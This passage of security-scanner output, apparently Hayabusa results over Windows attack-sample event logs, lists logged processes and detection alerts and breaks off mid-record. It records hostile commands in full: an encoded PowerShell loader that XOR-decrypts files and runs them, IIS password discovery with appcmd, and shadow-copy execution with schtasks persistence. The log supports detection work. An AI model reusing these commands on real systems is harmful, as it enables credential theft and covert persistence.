APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:19.563 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Line Number: 0"" /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe 
: User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:19.784 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Line Number: 0"" /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgAC
gAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:19.894 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:19.964 +09:00,IEWIN7,1,informational,Process 
Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:20.034 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Description: Cannot read configuration file due to insufficient permissions"" /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:20.124 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Description: Cannot read configuration file due to insufficient permissions"" /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:20.204 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : 
Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYw
BfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:20.305 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:20.435 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir "". 
)"" /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:20.555 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir "". )"" /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-28 00:12:38.241 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c whoami /groups : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:38.290 +09:00,IEWIN7,1,informational,Process Creation,Command: whoami /groups : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c whoami /groups ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:38.290 +09:00,IEWIN7,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:38.290 +09:00,IEWIN7,1,medium,Whoami 
Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:38.290 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:43.990 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=""VSS"") get state : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:44.055 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=""VSS"") get state : Path: C:\Windows\System32\wbem\WMIC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=""VSS"") get state",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:45.405 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 
00:12:45.491 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state : Path: C:\Windows\System32\wbem\WMIC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:47.402 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:47.478 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\"" : Path: C:\Windows\System32\wbem\WMIC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:47.478 +09:00,IEWIN7,1,medium,Shadow Copies Creation Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx 
-2019-05-28 00:12:48.655 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:48.763 +09:00,IEWIN7,1,informational,Process Creation,"Command: vssadmin List Shadows : Path: C:\Windows\System32\vssadmin.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:48.827 +09:00,IEWIN7,1,informational,Process Creation,"Command: find ""Shadow Copy Volume"" : Path: C:\Windows\System32\find.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:54.447 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:54.544 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe : Path: C:\Windows\System32\wbem\WMIC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe 
/c %SYSTEMROOT%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:54.544 +09:00,IEWIN7,1,medium,Suspicious WMI Execution,,rules/sigma/process_creation/win_susp_wmi_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:54.544 +09:00,IEWIN7,1,medium,Shadow Copies Creation Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:54.632 +09:00,IEWIN7,1,informational,Process Creation,Command: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe : Path: \Device\HarddiskVolumeShadowCopy7\Windows\Temp\svhost64.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:59.519 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c %%SYSTEMROOT%%\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:59.578 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management : Command: C:\Windows\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr 
""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" : Path: C:\Windows\System32\schtasks.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c %SYSTEMROOT%\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 11:13:52.171 +09:00,IEWIN7,1,informational,Process Creation,"Command: vshadow.exe -nw -exec=c:\windows\System32\osk.exe c:\ : Path: C:\ProgramData\vshadow.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx -2019-05-28 11:13:52.429 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: Process Launched via DCOM : Command: DrvInst.exe ""1"" ""200"" ""STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot11"" """" """" ""6350c17eb"" ""00000000"" ""000005AC"" ""00000590"" : Path: C:\Windows\System32\drvinst.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx -2019-05-28 11:13:53.507 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: IEWIN7\IEUser : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx -2019-05-28 11:14:48.819 +09:00,IEWIN7,1,informational,Process Creation,"Command: vshadow.exe -nw -exec=c:\windows\System32\notepad.exe c:\ : Path: C:\ProgramData\vshadow.exe : User: IEWIN7\IEUser : 
Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx -2019-05-28 11:14:49.194 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: Process Launched via DCOM : Command: DrvInst.exe ""1"" ""200"" ""STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot12"" """" """" ""6d110b0a3"" ""00000000"" ""000005B8"" ""000004B0"" : Path: C:\Windows\System32\drvinst.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx -2019-05-28 11:14:50.413 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""c:\windows\System32\notepad.exe"" : Path: C:\Windows\System32\notepad.exe : User: IEWIN7\IEUser : Parent Command: vshadow.exe -nw -exec=c:\windows\System32\notepad.exe c:\",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx -2019-06-15 07:22:17.988 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Downloads\a.exe"" : Path: C:\Users\IEUser\Downloads\a.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:22:21.535 +09:00,IEWIN7,1,informational,Process 